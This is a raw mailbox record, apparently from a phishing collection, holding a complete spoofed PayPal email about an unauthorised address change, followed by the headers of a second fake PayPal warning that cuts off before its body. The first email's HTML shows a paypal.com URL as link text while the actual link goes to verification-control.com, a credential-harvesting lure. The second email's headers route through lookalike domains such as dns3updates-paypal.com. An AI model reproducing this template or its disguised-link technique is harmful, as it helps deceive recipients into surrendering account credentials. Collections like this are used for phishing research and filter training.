From: services@paypal.com
Reply-To: "Customer Service" <services@paypal.com>
To: jose@monkey.org
Subject: PayPal emergency Notice!
Date: Sun, 24 Jul 2005 09:58:05 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--738385545215687"
X-Originating-IP: 204.181.64.8
Content-Length: 803
Lines: 29
Status: O
X-Status: 
X-Keywords:                  
X-UID: 139

----738385545215687
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Dear PayPal user,<br>
<br>
You have added plasma_tv_2003@earthlink.net as a new email address for<br>=

your PayPal account.<br>
<br>
If you did not authorize this change or if you need assistance with your<b=
r>
account, please contact PayPal customer service at:<br>
<br>
<br>
<a href=3D"http://www.verification-control.com/paypal/?f=3Dap_email" targe=
t=3D"_blank">https://www.paypal.com/row/wf/f=3Dap_email</a><br>
<br>
Thank you for using PayPal!<br>
The PayPal Team<br>
<br>
Please do not reply to this e-mail. Mail sent to this address cannot be<br=
>
answered. For assistance, log in to your PayPal account and choose the<br>=

&quot;Help&quot; link in the header of any page.<br>


----738385545215687--

From GQZZPWSSB@paypal.com  Sun Jul 24 05:39:48 2005
Return-Path: <GQZZPWSSB@paypal.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 876C0536E3A
	for <jose@login.monkey.org>; Sun, 24 Jul 2005 05:39:48 -0400 (EDT)
Received: from ip-193-19-214-58.metro.comel-it.com (ip-193-19-214-58.metro.comel-it.com [193.19.214.58])
	by mail2.monkey.org (Postfix) with SMTP id 9080E18371B
	for <jose@monkey.org>; Sun, 24 Jul 2005 05:39:39 -0400 (EDT)
X-Message-Info: 969yvDpIBY0WWPqai088vuAPgbtB7HDH67dLDdhEF556
Received: from dns3updates-paypal.com (84.20.143.160) by tmt0-rd96.services-paypal.com with Microsoft SMTPSVC(5.0.2195.6824);
	 Sun, 24 Jul 2005 05:28:52 -0600
Received: from paypal.com (127.0.0.1) by dnsservices-paypal.com
  (SMTPD32-7.12     ) id Y66YAQ27; Sun, 24 Jul 2005 04:29:52 -0700
Subject: Paypal Very Important Warning! # 4
